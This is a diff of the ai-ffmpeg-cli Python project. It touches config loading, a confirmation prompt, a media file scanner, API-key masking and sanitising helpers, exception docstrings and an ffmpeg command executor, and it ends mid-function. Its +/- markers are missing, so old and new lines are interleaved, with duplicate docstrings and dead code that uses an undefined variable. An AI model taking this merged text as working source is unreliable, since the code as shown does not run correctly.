    def validate_output_directory(cls, v: str) -> str:
        """Validate and normalize output directory.

        Ensures the output directory is a valid path and creates it if it doesn't exist.

        Args:
            v: Output directory path as string

        Returns:
            Validated absolute output directory path
        """
        if not v or not isinstance(v, str):
            raise ValueError("Output directory is required")

        try:
            abs_path = os.path.abspath(v)
            # Create directory if it doesn't exist
            if not os.path.exists(abs_path):
                os.makedirs(abs_path, exist_ok=True)
                logger.info(f"Created output directory: {abs_path}")
            elif not os.path.isdir(abs_path):
                raise ValueError(f"Output directory path exists but is not a directory: {v}")

            return abs_path
        except (OSError, ValueError) as e:
            logger.warning(f"Invalid output directory path {v}: {e}")
            # Fallback to "aiclip" in current directory
            fallback_path = os.path.abspath("aiclip")
            try:
                os.makedirs(fallback_path, exist_ok=True)
                logger.info(f"Using fallback output directory: {fallback_path}")
                return fallback_path
            except OSError:
                # Last resort: use current directory
                logger.warning("Could not create output directory, using current directory")
                return os.getcwd()

    def validate_ffmpeg_available(self) -> None:
        """Validate that ffmpeg is available in PATH."""
        """Validate that ffmpeg is available in PATH.

        Checks if ffmpeg executable is accessible in the system PATH.
        Required for all video processing operations.

        Raises:
            ConfigError: When ffmpeg is not found in PATH
        """
        if shutil.which("ffmpeg") is None:
            raise ConfigError(
                "ffmpeg not found in PATH. Please install ffmpeg (e.g., brew install ffmpeg) and retry."
            )

    def validate_api_key_for_use(self) -> None:
        """Validate API key is present and properly formatted for use."""
        """Validate API key is present and properly formatted for use.

        Checks that the API key exists and follows the correct format
        before allowing it to be used for API calls.

        Raises:
            ConfigError: When API key is missing or invalid
        """
        if not self.openai_api_key:
            raise ConfigError(
                "OPENAI_API_KEY is required for LLM parsing. "
@@ -121,7 +213,17 @@ class AppConfig(BaseModel):
            )

    def get_api_key_for_client(self) -> str:
        """Get the API key value for client use. Validates first."""
        """Get the API key value for client use. Validates first.

        Validates the API key format and presence before returning
        it for use in API clients.

        Returns:
            Validated API key string

        Raises:
            ConfigError: When API key validation fails
        """
        self.validate_api_key_for_use()
        return self.openai_api_key  # type: ignore

@@ -129,24 +231,27 @@
def load_config() -> AppConfig:
    """Load configuration from environment variables and validate environment.

    Loads configuration from environment variables and .env files,
    validates all settings, and ensures required dependencies are available.

    Returns
    -------
    AppConfig
        Parsed configuration instance.
        Parsed and validated configuration instance.

    Raises
    ------
    ConfigError
        If configuration is invalid or required dependencies are missing.
    """
    # Load environment variables from .env file
    # Load environment variables from .env file (don't override existing env vars)
    load_dotenv(override=False)

    try:
        # Get API key from environment
        api_key = os.getenv("OPENAI_API_KEY")

        # Get allowed directories (comma-separated list)
        # Parse allowed directories from comma-separated environment variable
        allowed_dirs_str = os.getenv("AICLIP_ALLOWED_DIRS", "")
        allowed_dirs = (
            [d.strip() for d in allowed_dirs_str.split(",") if d.strip()]
@@ -154,17 +259,20 @@ def load_config() -> AppConfig:
            else []
        )

        # Create configuration instance with environment values
        config = AppConfig(
            openai_api_key=api_key,
            allowed_directories=allowed_dirs or [os.getcwd()],
            timeout_seconds=int(os.getenv("AICLIP_TIMEOUT", "60")),
            max_file_size=int(os.getenv("AICLIP_MAX_FILE_SIZE", str(500 * 1024 * 1024))),
            rate_limit_requests=int(os.getenv("AICLIP_RATE_LIMIT", "60")),
            output_directory=os.getenv("AICLIP_OUTPUT_DIR", "aiclip"),
        )

        logger.debug(f"Configuration loaded successfully with API key: {mask_api_key(api_key)}")

    except (ValidationError, ValueError) as exc:
        # Sanitize error messages to prevent API key exposure
        sanitized_error = str(exc).replace(api_key or "", "***API_KEY***") if api_key else str(exc)
        raise ConfigError(
            f"Configuration validation failed: {sanitized_error}. "
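The `AICLIP_ALLOWED_DIRS` handling in `load_config` above reduces to a small comma-splitting step; a minimal testable sketch of just that step (the environment variable name comes from the hunk, the helper name is ours):

```python
def parse_allowed_dirs(env_value: str) -> list[str]:
    """Split a comma-separated directory list, dropping empty entries."""
    return [d.strip() for d in env_value.split(",") if d.strip()]


print(parse_allowed_dirs("/data, ,/tmp "))  # ['/data', '/tmp']
```

An empty or unset variable yields an empty list, which is why `load_config` falls back to `[os.getcwd()]`.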
@@ -1,14 +1,73 @@
"""User confirmation utilities for ai-ffmpeg-cli.

This module provides utilities for prompting users for confirmation
before executing potentially destructive operations.
"""

from __future__ import annotations

from rich.console import Console
from rich.panel import Panel
from rich.prompt import Confirm
from rich.text import Text

# Initialize console for Rich output
console = Console()


def confirm_prompt(question: str, default_yes: bool = True, assume_yes: bool = False) -> bool:
    """Prompt user for confirmation with configurable defaults.

    Displays a confirmation prompt to the user and returns their response.
    Supports configurable defaults and automatic yes responses for
    non-interactive scenarios.

    Args:
        question: The question to ask the user
        default_yes: Whether the default response should be yes (Y/n vs y/N)
        assume_yes: Whether to automatically return True without prompting

    Returns:
        True if user confirms, False if user declines

    Note:
        Handles EOFError gracefully by returning the default response
    """
    if assume_yes:
        return True
    default = "Y/n" if default_yes else "y/N"

    # Set up the prompt with appropriate default indicator
    default_choice = "Y" if default_yes else "N"

    # Create styled confirmation prompt
    prompt_text = Text()
    prompt_text.append(question, style="bold white")

    # Create confirmation panel
    confirm_panel = Panel(
        prompt_text,
        title="[bold cyan]Confirmation Required[/bold cyan]",
        border_style="cyan",
        padding=(1, 2),
    )

    try:
        resp = input(f"{question} [{default}] ").strip().lower()
        console.print(confirm_panel)
        # Use Rich's Confirm prompt for better integration
        is_affirmative = Confirm.ask(
            "",
            default=default_yes,
            show_default=False,  # We already show the default in the panel
            console=console,
        )

        # Show user's choice
        choice_display = "Yes" if is_affirmative else "No"
        console.print(f"[dim]User choice: {choice_display}[/dim]")

        return is_affirmative

    except EOFError:
        # Handle Ctrl+D gracefully by returning default
        console.print(f"[dim]Using default: {default_choice}[/dim]")
        return default_yes
    if not resp:
        return default_yes
    return resp in {"y", "yes"}
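The plain-`input` path being removed above encodes the same decision rule the Rich `Confirm.ask` call replaces: empty input means "take the default", and only `y`/`yes` counts as affirmative. A standalone sketch of that rule (the helper name is ours, not part of the module):

```python
def resolve_response(resp: str, default_yes: bool) -> bool:
    """Decision rule from the removed input()-based code path above."""
    resp = resp.strip().lower()
    if not resp:
        return default_yes
    return resp in {"y", "yes"}


print(resolve_response("", True))    # True
print(resolve_response("YES", False))  # True
print(resolve_response("n", True))   # False
```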
@@ -1,72 +0,0 @@
from __future__ import annotations

import json
import shutil
import subprocess  # nosec B404: subprocess is used safely with explicit args and no shell
from pathlib import Path

from .io_utils import most_recent_file

MEDIA_EXTS = {
    "video": {".mp4", ".mov", ".mkv", ".webm", ".avi"},
    "audio": {".mp3", ".aac", ".wav", ".m4a", ".flac"},
    "image": {".png", ".jpg", ".jpeg"},
}


def _ffprobe_duration(path: Path) -> float | None:
    ffprobe_path = shutil.which("ffprobe")
    if ffprobe_path is None:
        return None
    try:
        # Call ffprobe with explicit args and no shell
        result = subprocess.run(  # nosec B603, B607
            [
                "ffprobe",
                "-v",
                "error",
                "-show_entries",
                "format=duration",
                "-of",
                "json",
                str(path),
            ],
            capture_output=True,
            check=True,
            text=True,
        )
        data = json.loads(result.stdout)
        dur = data.get("format", {}).get("duration")
        return float(dur) if dur is not None else None
    except Exception:
        return None


def scan(cwd: Path | None = None) -> dict[str, object]:
    base = cwd or Path.cwd()
    files: list[Path] = [p for p in base.iterdir() if p.is_file()]

    videos = [p for p in files if p.suffix.lower() in MEDIA_EXTS["video"]]
    audios = [p for p in files if p.suffix.lower() in MEDIA_EXTS["audio"]]
    images = [p for p in files if p.suffix.lower() in MEDIA_EXTS["image"]]

    most_recent_video = most_recent_file(videos)

    info = []
    for p in videos + audios:
        info.append(
            {
                "path": str(p),
                "size": p.stat().st_size if p.exists() else None,
                "duration": _ffprobe_duration(p),
            }
        )

    return {
        "cwd": str(base),
        "videos": [str(p) for p in videos],
        "audios": [str(p) for p in audios],
        "images": [str(p) for p in images],
        "most_recent_video": str(most_recent_video) if most_recent_video else None,
        "info": info,
    }
269
src/ai_ffmpeg_cli/context_scanner_basic.py
Normal file
@@ -0,0 +1,269 @@
"""Basic context scanner for ai-ffmpeg-cli.

This module provides basic file context scanning functionality,
identifying media files in the current directory for LLM context.
"""

from __future__ import annotations

import json
import shutil
import subprocess  # nosec B404: subprocess is used safely with explicit args and no shell
from pathlib import Path
from typing import Any

from rich.console import Console
from rich.table import Table

from .file_operations import most_recent_file

# Initialize console for Rich output
console = Console()

# Supported media file extensions for context scanning
MEDIA_EXTS = {
    "video": {".mp4", ".mov", ".mkv", ".webm", ".avi", ".m4v", ".3gp", ".flv", ".wmv"},
    "audio": {".mp3", ".aac", ".wav", ".m4a", ".flac", ".ogg", ".wma", ".opus"},
    "image": {".png", ".jpg", ".jpeg", ".gif", ".bmp", ".tiff", ".webp"},
    "subtitle": {".srt", ".vtt", ".ass", ".ssa", ".sub", ".idx"},
}


def _format_file_size(size_bytes: int) -> str:
    """Format file size in human-readable format.

    Args:
        size_bytes: Size in bytes

    Returns:
        Formatted size string
    """
    if size_bytes < 1024:
        return f"{size_bytes} B"
    elif size_bytes < 1024 * 1024:
        return f"{size_bytes / 1024:.1f} KB"
    elif size_bytes < 1024 * 1024 * 1024:
        return f"{size_bytes / (1024 * 1024):.1f} MB"
    else:
        return f"{size_bytes / (1024 * 1024 * 1024):.1f} GB"


def _format_duration(seconds: float | None) -> str:
    """Format duration in human-readable format.

    Args:
        seconds: Duration in seconds

    Returns:
        Formatted duration string
    """
    if seconds is None:
        return "Unknown"

    hours = int(seconds // 3600)
    minutes = int((seconds % 3600) // 60)
    secs = int(seconds % 60)

    if hours > 0:
        return f"{hours:02d}:{minutes:02d}:{secs:02d}"
    else:
        return f"{minutes:02d}:{secs:02d}"
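To make the thresholds above concrete, here is a standalone copy of the size formatter with sample outputs (same logic as `_format_file_size`, renamed only so it can run outside the module):

```python
def format_file_size(size_bytes: int) -> str:
    """Human-readable size, mirroring _format_file_size above."""
    if size_bytes < 1024:
        return f"{size_bytes} B"
    elif size_bytes < 1024**2:
        return f"{size_bytes / 1024:.1f} KB"
    elif size_bytes < 1024**3:
        return f"{size_bytes / 1024**2:.1f} MB"
    else:
        return f"{size_bytes / 1024**3:.1f} GB"


print(format_file_size(512))          # 512 B
print(format_file_size(1536))         # 1.5 KB
print(format_file_size(3 * 1024**2))  # 3.0 MB
```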
def _ffprobe_duration(path: Path) -> float | None:
    """Extract duration of a media file using ffprobe.

    Uses ffprobe to get the duration of video or audio files
    for context information.

    Args:
        path: Path to the media file

    Returns:
        Duration in seconds, or None if ffprobe is unavailable or fails
    """
    ffprobe_path = shutil.which("ffprobe")
    if ffprobe_path is None:
        return None
    try:
        # Call ffprobe with explicit args and no shell for security
        result = subprocess.run(  # nosec B603, B607
            [
                "ffprobe",
                "-v",
                "error",
                "-show_entries",
                "format=duration",
                "-of",
                "json",
                str(path),
            ],
            capture_output=True,
            check=True,
            text=True,
        )
        data = json.loads(result.stdout)
        dur = data.get("format", {}).get("duration")
        return float(dur) if dur is not None else None
    except Exception:
        # Return None for any ffprobe errors
        return None


def _display_scan_summary(context: dict) -> None:
    """Display a summary of the scan results using Rich.

    Args:
        context: Context dictionary from scan()
    """
    # Create summary table
    summary_table = Table(
        title="[bold blue]Scan Summary[/bold blue]", show_header=False, box=None
    )
    summary_table.add_column("Category", style="bold cyan")
    summary_table.add_column("Count", style="bold green", justify="center")
    summary_table.add_column("Details", style="white")

    # Add video files
    videos = context.get("videos", [])
    if videos:
        total_size = sum(Path(v).stat().st_size for v in videos if Path(v).exists())
        summary_table.add_row(
            "Videos",
            str(len(videos)),
            f"Total size: {_format_file_size(total_size)}",
        )

    # Add audio files
    audios = context.get("audios", [])
    if audios:
        total_size = sum(Path(a).stat().st_size for a in audios if Path(a).exists())
        summary_table.add_row(
            "Audio", str(len(audios)), f"Total size: {_format_file_size(total_size)}"
        )

    # Add image files
    images = context.get("images", [])
    if images:
        total_size = sum(Path(i).stat().st_size for i in images if Path(i).exists())
        summary_table.add_row(
            "Images", str(len(images)), f"Total size: {_format_file_size(total_size)}"
        )

    # Add subtitle files
    subtitle_files = context.get("subtitle_files", [])
    if subtitle_files:
        summary_table.add_row(
            "Subtitles", str(len(subtitle_files)), "Ready for processing"
        )

    if summary_table.row_count > 0:
        console.print(summary_table)
        console.print()


def _display_detailed_file_info(context: dict) -> None:
    """Display detailed file information in a table format.

    Args:
        context: Context dictionary from scan()
    """
    info = context.get("info", [])
    if not info:
        return

    # Create detailed file table
    file_table = Table(title="[bold green]File Details[/bold green]")
    file_table.add_column("File", style="bold white")
    file_table.add_column("Size", style="cyan", justify="right")
    file_table.add_column("Duration", style="yellow", justify="center")
    file_table.add_column("Type", style="bold", justify="center")

    for file_info in info:
        path = Path(file_info["path"])
        size = file_info.get("size", 0)
        duration = file_info.get("duration")

        # Determine file type
        ext = path.suffix.lower()
        if ext in MEDIA_EXTS["video"]:
            file_type = "Video"
        elif ext in MEDIA_EXTS["audio"]:
            file_type = "Audio"
        else:
            file_type = "Other"

        file_table.add_row(
            path.name,
            _format_file_size(size) if size else "Unknown",
            _format_duration(duration),
            file_type,
        )

    if file_table.row_count > 0:
        console.print(file_table)
        console.print()


def scan(cwd: Path | None = None, show_summary: bool = True) -> dict[str, Any]:
    """Scan current directory for media files and build context.

    Scans the specified directory (or current working directory)
    for media files and builds a context dictionary containing
    file information for LLM processing.

    Args:
        cwd: Directory to scan (defaults to current working directory)
        show_summary: Whether to display scan summary (default: True)

    Returns:
        Dictionary containing:
            - cwd: Current working directory path
            - videos: List of video file paths
            - audios: List of audio file paths
            - images: List of image file paths
            - subtitle_files: List of subtitle file paths
            - most_recent_video: Path to most recently modified video
            - info: List of file info dictionaries with path, size, and duration
    """
    base = cwd or Path.cwd()
    files: list[Path] = []
    # Scan current directory only for media files
    files.extend([p for p in base.iterdir() if p.is_file()])

    # Categorize files by media type
    videos = [p for p in files if p.suffix.lower() in MEDIA_EXTS["video"]]
    audios = [p for p in files if p.suffix.lower() in MEDIA_EXTS["audio"]]
    images = [p for p in files if p.suffix.lower() in MEDIA_EXTS["image"]]
    subtitle_files = [p for p in files if p.suffix.lower() in MEDIA_EXTS["subtitle"]]

    # Find the most recently modified video file
    most_recent_video = most_recent_file(videos)

    # Build detailed info for video and audio files
    info = []
    for p in videos + audios:
        info.append(
            {
                "path": str(p),
                "size": p.stat().st_size if p.exists() else None,
                "duration": _ffprobe_duration(p),
            }
        )

    context = {
        "cwd": str(base),
        "videos": [str(p) for p in videos],
        "audios": [str(p) for p in audios],
        "images": [str(p) for p in images],
        "subtitle_files": [str(p) for p in subtitle_files],
        "most_recent_video": str(most_recent_video) if most_recent_video else None,
        "info": info,
    }

    # Display scan summary if requested
    if show_summary:
        _display_scan_summary(context)
        _display_detailed_file_info(context)

    return context
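The categorization in `scan` is plain case-insensitive suffix matching against the `MEDIA_EXTS` sets. A hypothetical standalone version of one bucket, to show the matching rule in isolation:

```python
from pathlib import Path

# Subset of the MEDIA_EXTS "video" set above, for illustration.
VIDEO_EXTS = {".mp4", ".mov", ".mkv", ".webm", ".avi"}


def pick_videos(names: list[str]) -> list[str]:
    """Keep names whose extension matches, case-insensitively."""
    return [n for n in names if Path(n).suffix.lower() in VIDEO_EXTS]


print(pick_videos(["a.MP4", "notes.txt", "b.mov"]))  # ['a.MP4', 'b.mov']
```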
@@ -1,8 +1,7 @@
"""Context scanner for ai-ffmpeg-cli.
"""Extended context scanner for ai-ffmpeg-cli.

This module scans the current working directory to identify available media files
and provides context information for natural language processing. It detects
videos, audio files, and images, and extracts metadata like duration and file size.
This module provides enhanced context scanning functionality for the ai-ffmpeg-cli
package, including comprehensive media file detection and metadata extraction.

Key features:
- Media file detection by extension
@@ -24,7 +23,7 @@ import shutil
import subprocess  # nosec B404: subprocess is used safely with explicit args and no shell
from pathlib import Path

from .file_security import most_recent_file
from .path_security import most_recent_file

# Supported media file extensions by category
MEDIA_EXTS = {
@@ -100,12 +99,12 @@ def scan(cwd: Path | None = None) -> dict[str, object]:
    base = cwd or Path.cwd()
    files: list[Path] = [p for p in base.iterdir() if p.is_file()]

    # Categorize files by media type
    # Categorize files by media type using extension matching
    videos = [p for p in files if p.suffix.lower() in MEDIA_EXTS["video"]]
    audios = [p for p in files if p.suffix.lower() in MEDIA_EXTS["audio"]]
    images = [p for p in files if p.suffix.lower() in MEDIA_EXTS["image"]]

    # Find the most recently modified video file
    # Find the most recently modified video file for context
    most_recent_video = most_recent_file(videos)

    # Collect detailed metadata for videos and audio files
@@ -1,22 +1,33 @@
"""Security utilities for handling sensitive data and credentials."""
"""Security utilities for handling sensitive data and credentials.

This module provides utilities for secure handling of API keys and other
sensitive information, including masking, validation, and secure logging.
"""

from __future__ import annotations

import logging
import re
from typing import TYPE_CHECKING
from typing import Any

if TYPE_CHECKING:
    from pydantic_core.core_schema import AfterValidatorFunctionSchema  # noqa: TC003

logger = logging.getLogger(__name__)


def mask_api_key(api_key: str | None) -> str:
    """Mask API key for safe display in logs and errors.

    Creates a masked version of an API key that shows only the first
    and last few characters, preventing accidental exposure in logs.

    Args:
        api_key: The API key to mask

    Returns:
        str: Masked version safe for logging
        str: Masked version safe for logging and error messages
    """
    if not api_key or not isinstance(api_key, str):
        return "***NO_KEY***"
@@ -31,6 +42,9 @@ def mask_api_key(api_key: str | None) -> str:
def validate_api_key_format(api_key: str | None) -> bool:
    """Validate API key has expected format without logging the key.

    Checks that the API key follows the expected OpenAI format
    without exposing the actual key value.

    Args:
        api_key: The API key to validate

@@ -40,11 +54,15 @@ def validate_api_key_format(api_key: str | None) -> bool:
    if not api_key or not isinstance(api_key, str):
        return False

    # OpenAI API keys start with 'sk-' and have specific length/format
    # OpenAI API keys start with 'sk-' and can include various formats:
    # - sk-... (standard keys)
    # - sk-proj-... (project keys)
    # - sk-org-... (organization keys)
    if api_key.startswith("sk-"):
        # Remove prefix and check remaining characters
        key_body = api_key[3:]
        if len(key_body) >= 32 and re.match(r"^[a-zA-Z0-9]+$", key_body):
        # Allow alphanumeric characters, hyphens, and underscores
        if len(key_body) >= 32 and re.match(r"^[a-zA-Z0-9_-]+$", key_body):
            return True

    return False
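The widened character class in the hunk above is what lets `sk-proj-…` style keys pass, since their bodies contain hyphens. A minimal sketch of just that check, using the pattern shown (illustrative helper name, not the module's API):

```python
import re


def looks_like_openai_key(api_key: str) -> bool:
    """Format check mirroring the widened pattern above (illustrative only)."""
    if not api_key.startswith("sk-"):
        return False
    key_body = api_key[3:]
    # >= 32 chars of alphanumerics, hyphens, or underscores after the prefix
    return len(key_body) >= 32 and re.match(r"^[a-zA-Z0-9_-]+$", key_body) is not None


print(looks_like_openai_key("sk-proj-" + "a" * 32))  # True
print(looks_like_openai_key("sk-short"))             # False
```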
@@ -53,16 +71,19 @@ def validate_api_key_format(api_key: str | None) -> bool:
def sanitize_error_message(message: str) -> str:
    """Remove sensitive information from error messages.

    Scans error messages for patterns that might contain sensitive
    data and replaces them with safe placeholders.

    Args:
        message: Original error message

    Returns:
        str: Sanitized error message
        str: Sanitized error message with sensitive data masked
    """
    if not message:
        return ""

    # Patterns to mask
    # Patterns to mask for security
    patterns = [
        # API keys
        (r"sk-[a-zA-Z0-9]{10,}", "***API_KEY***"),
@@ -84,13 +105,29 @@ def sanitize_error_message(message: str) -> str:


class SecureLogger:
    """Logger wrapper that automatically sanitizes sensitive data."""
    """Logger wrapper that automatically sanitizes sensitive data.

    Provides a drop-in replacement for the standard logger that
    automatically masks sensitive information in all log messages.
    """

    def __init__(self, logger_name: str):
        """Initialize secure logger with the given name.

        Args:
            logger_name: Name for the underlying logger
        """
        self.logger = logging.getLogger(logger_name)

    def _sanitize_args(self, args: tuple[Any, ...]) -> tuple[Any, ...]:
        """Sanitize logging arguments to remove sensitive data."""
        """Sanitize logging arguments to remove sensitive data.

        Args:
            args: Logging arguments to sanitize

        Returns:
            Tuple of sanitized arguments
        """
        return tuple(
            sanitize_error_message(str(arg)) if isinstance(arg, str) else arg for arg in args
        )
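The `sk-` pattern listed in the hunk can be exercised on its own; a minimal sanitizer using just that one pattern (the real `sanitize_error_message` masks additional patterns not shown here):

```python
import re


def sanitize(message: str) -> str:
    """Mask OpenAI-style keys using the pattern from the hunk above."""
    return re.sub(r"sk-[a-zA-Z0-9]{10,}", "***API_KEY***", message)


print(sanitize("auth failed for sk-abcdefghij1234"))
# auth failed for ***API_KEY***
```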
@@ -119,6 +156,9 @@ class SecureLogger:
|
||||
def create_secure_logger(name: str) -> SecureLogger:
|
||||
"""Create a logger that automatically sanitizes sensitive data.
|
||||
|
||||
Factory function to create a secure logger instance that will
|
||||
automatically mask sensitive information in all log messages.
|
||||
|
||||
Args:
|
||||
name: Logger name
|
||||
|
||||
@@ -129,40 +169,67 @@ def create_secure_logger(name: str) -> SecureLogger:
|
||||
|
||||
|
||||
class SecretStr:
|
||||
"""String wrapper that prevents accidental exposure of sensitive data."""
|
||||
"""String wrapper that prevents accidental exposure of sensitive data.
|
||||
|
||||
Provides a safe wrapper around sensitive strings that prevents
|
||||
accidental logging or display of the actual value.
|
||||
"""
|
||||
|
||||
def __init__(self, value: str | None):
|
||||
"""Initialize with a sensitive string value.
|
||||
|
||||
Args:
|
||||
value: The sensitive string to wrap
|
||||
"""
|
||||
self._value = value
|
||||
|
||||
def get_secret_value(self) -> str | None:
|
||||
"""Get the actual secret value. Use with caution."""
|
||||
"""Get the actual secret value. Use with caution.
|
||||
|
||||
Returns:
|
||||
The actual secret value (use only when absolutely necessary)
|
||||
"""
|
||||
return self._value
|
||||
|
||||
def __str__(self) -> str:
|
||||
"""String representation that masks the secret."""
|
||||
return "***SECRET***"
|
||||
|
||||
def __repr__(self) -> str:
|
||||
"""Representation that masks the secret."""
|
||||
return "SecretStr('***SECRET***')"
|
||||
|
||||
def __bool__(self) -> bool:
|
||||
"""Boolean evaluation based on whether value exists."""
|
||||
return bool(self._value)
|
||||
|
||||
def __eq__(self, other: object) -> bool:
|
||||
"""Equality comparison with other SecretStr instances."""
|
||||
if isinstance(other, SecretStr):
|
||||
return self._value == other._value
|
||||
return False
|
||||
|
||||
def mask(self) -> str:
|
||||
"""Get masked version of the secret."""
|
||||
"""Get masked version of the secret.
|
||||
|
||||
Returns:
|
||||
Masked version showing partial content
|
||||
"""
|
||||
return mask_api_key(self._value)
|
||||
|
||||
def is_valid_format(self) -> bool:
|
||||
"""Check if secret has valid format."""
|
||||
"""Check if secret has valid format.
|
||||
|
||||
Returns:
|
||||
True if the secret follows expected format
|
||||
"""
|
||||
return validate_api_key_format(self._value)
|
||||
|
||||
@classmethod
|
||||
def __get_pydantic_core_schema__(cls, source_type, handler):
|
||||
"""Pydantic v2 compatibility."""
|
||||
def __get_pydantic_core_schema__(
|
||||
cls, source_type: Any, handler: Any
|
||||
) -> AfterValidatorFunctionSchema:
|
||||
"""Pydantic v2 compatibility for schema generation."""
|
||||
from pydantic_core import core_schema
|
||||
|
||||
return core_schema.no_info_after_validator_function(
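The `SecretStr` wrapper above can be exercised in isolation. The following is a minimal sketch of the same pattern, not the library code itself; `mask_api_key` is not shown in this hunk, so a hypothetical stand-in is used here:

```python
def mask_api_key(value):
    # Hypothetical stand-in: the real mask_api_key lives elsewhere in the module.
    if not value or len(value) < 8:
        return "***"
    return value[:4] + "..." + value[-2:]


class SecretStr:
    """Minimal re-creation of the wrapper shown in the diff."""

    def __init__(self, value):
        self._value = value

    def get_secret_value(self):
        # Returns the actual value: use with caution.
        return self._value

    def __str__(self):
        return "***SECRET***"

    def __repr__(self):
        return "SecretStr('***SECRET***')"

    def __bool__(self):
        return bool(self._value)

    def mask(self):
        return mask_api_key(self._value)


key = SecretStr("sk-abc123xyz456")
print(f"loaded key: {key}")  # loaded key: ***SECRET***
print(key.mask())            # sk-a...56
```

The point of the pattern is that any accidental `str()`, `repr()`, or f-string interpolation of the wrapper emits the mask, so secrets only leak through an explicit `get_secret_value()` call.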
@@ -15,6 +15,9 @@ class ConfigError(Exception):
    - Configuration file problems
    - Missing dependencies (e.g., ffmpeg not in PATH)
    - Invalid API keys or credentials

    This exception should be handled at the application level to
    provide clear guidance to users about configuration issues.
    """


@@ -26,6 +29,9 @@ class ParseError(Exception):
    - LLM returns invalid JSON
    - Intent validation fails
    - API communication errors occur

    This exception indicates issues with the LLM processing pipeline
    and should be handled with appropriate retry logic or user guidance.
    """


@@ -37,6 +43,9 @@ class BuildError(Exception):
    - Command plan generation fails
    - Security validation fails
    - Unsupported operations are requested

    This exception indicates issues with converting user intent into
    executable commands and should be handled with clear error messages.
    """


@@ -48,4 +57,7 @@ class ExecError(Exception):
    - File operations fail
    - Permission issues occur
    - System resource problems

    This exception indicates runtime execution failures and should
    be handled with appropriate error recovery or user notification.
    """
@@ -1,14 +0,0 @@
class ConfigError(Exception):
    """Raised when configuration or environment validation fails."""


class ParseError(Exception):
    """Raised when the LLM fails to produce a valid intent."""


class BuildError(Exception):
    """Raised when an intent cannot be routed or converted into commands."""


class ExecError(Exception):
    """Raised when command execution fails."""
@@ -1,3 +1,9 @@
"""Command execution utilities for ai-ffmpeg-cli.

This module handles the execution of ffmpeg commands with proper
validation, error handling, and user interaction.
"""

from __future__ import annotations

import logging
@@ -6,20 +12,45 @@ import subprocess  # nosec B404: subprocess used with explicit list args, no she
from pathlib import Path

from rich.console import Console
from rich.panel import Panel
from rich.table import Table

from .confirm import confirm_prompt
from .errors import ExecError
from .custom_exceptions import ExecError

logger = logging.getLogger(__name__)

# Initialize console for Rich output
console = Console()


def _format_command(cmd: list[str]) -> str:
    """Format command list as a readable string.

    Converts a command argument list into a space-separated string
    for display purposes.

    Args:
        cmd: Command argument list

    Returns:
        Formatted command string
    """
    return " ".join(cmd)


def _extract_output_path(cmd: list[str]) -> Path | None:
    """Extract the output file path from an ffmpeg command."""
    """Extract the output file path from an ffmpeg command.

    Parses the command to find the output file path, which is
    typically the last argument in ffmpeg commands.

    Args:
        cmd: ffmpeg command argument list

    Returns:
        Output file path, or None if not found
    """
    if len(cmd) < 2:
        return None
    # Output file is typically the last argument in ffmpeg commands
@@ -27,9 +58,21 @@ def _extract_output_path(cmd: list[str]) -> Path | None:


def _check_overwrite_protection(commands: list[list[str]], assume_yes: bool = False) -> bool:
    """Check for existing output files and prompt for overwrite confirmation."""
    """Check for existing output files and prompt for overwrite confirmation.

    Scans all commands for existing output files and prompts the user
    for confirmation before overwriting them.

    Args:
        commands: List of ffmpeg command lists to check
        assume_yes: Whether to skip confirmation prompts

    Returns:
        True if operation should proceed, False if cancelled
    """
    existing_files = []

    # Scan all commands for existing output files
    for cmd in commands:
        output_path = _extract_output_path(cmd)
        if output_path and output_path.exists():
@@ -41,13 +84,24 @@ def _check_overwrite_protection(commands: list[list[str]], assume_yes: bool = Fa
    if assume_yes:
        return True  # Skip confirmation

    # Show which files would be overwritten
    console = Console()
    console.print(
        "\n[yellow]Warning: The following files already exist and will be overwritten:[/yellow]"
    # Show which files would be overwritten in a table
    overwrite_table = Table(
        title="[bold yellow]Files That Will Be Overwritten[/bold yellow]"
    )
    for file_path in existing_files:
        console.print(f"  • {file_path}")
    overwrite_table.add_column("#", style="bold red", justify="center")
    overwrite_table.add_column("File Path", style="white")
    overwrite_table.add_column("Size", style="cyan", justify="right")

    for i, file_path in enumerate(existing_files, 1):
        size = file_path.stat().st_size if file_path.exists() else 0
        size_str = (
            f"{size / (1024 * 1024):.1f} MB"
            if size > 1024 * 1024
            else f"{size / 1024:.1f} KB"
        )
        overwrite_table.add_row(str(i), str(file_path), size_str)

    console.print(overwrite_table)
    console.print()

    return confirm_prompt(
@@ -56,15 +110,101 @@ def _check_overwrite_protection(commands: list[list[str]], assume_yes: bool = Fa


def preview(commands: list[list[str]]) -> None:
    console = Console()
    table = Table(title="Planned ffmpeg Commands")
    table.add_column("#", justify="right")
    table.add_column("Command", overflow="fold")
    """Display a preview of planned ffmpeg commands.

    Shows a formatted table of all commands that will be executed,
    allowing users to review before confirmation.

    Args:
        commands: List of ffmpeg command lists to preview
    """
    if not commands:
        console.print("[yellow]⚠️ No commands to preview[/yellow]")
        return

    # Create enhanced command preview table
    table = Table(title="[bold green]Planned ffmpeg Commands[/bold green]")
    table.add_column("#", style="bold cyan", justify="center")
    table.add_column("Command", style="white", overflow="fold")
    table.add_column("Output", style="green", overflow="fold")
    table.add_column("Status", style="bold", justify="center")

    for idx, cmd in enumerate(commands, start=1):
        table.add_row(str(idx), _format_command(cmd))
        # Extract output file for display
        output_path = _extract_output_path(cmd)
        output_display = str(output_path) if output_path else "N/A"

        # Check if output file exists
        status = "New" if not output_path or not output_path.exists() else "Overwrite"

        table.add_row(str(idx), _format_command(cmd), output_display, status)

    console.print(table)
    console.print()


def _execute_single_command(cmd: list[str], cmd_num: int, total_cmds: int) -> None:
    """Execute a single ffmpeg command with progress feedback.

    Args:
        cmd: Command to execute
        cmd_num: Current command number (1-based)
        total_cmds: Total number of commands
    """
    # Validate command is not empty
    if not cmd:
        raise ExecError("Empty command received for execution.")

    # Validate executable exists to avoid PATH surprises
    ffmpeg_exec = cmd[0]
    resolved = shutil.which(ffmpeg_exec)
    if resolved is None:
        raise ExecError(
            f"Executable not found: {ffmpeg_exec}. Ensure it is installed and on PATH."
        )

    # Final security validation of the command
    from .file_operations import validate_ffmpeg_command

    if not validate_ffmpeg_command(cmd):
        logger.error(f"Command failed security validation: {' '.join(cmd[:3])}...")
        raise ExecError(
            "Command failed security validation. This could be due to: "
            "(1) unsafe file paths or arguments, "
            "(2) unsupported ffmpeg flags, "
            "or (3) potential security risks. "
            "Please check your input and try a simpler operation."
        )

    # Show command being executed
    output_path = _extract_output_path(cmd)
    console.print(f"[bold blue]Executing command {cmd_num}/{total_cmds}:[/bold blue]")
    console.print(f"[dim]Output:[/dim] {output_path}")

    try:
        # Execute the command with proper error handling
        result = subprocess.run(
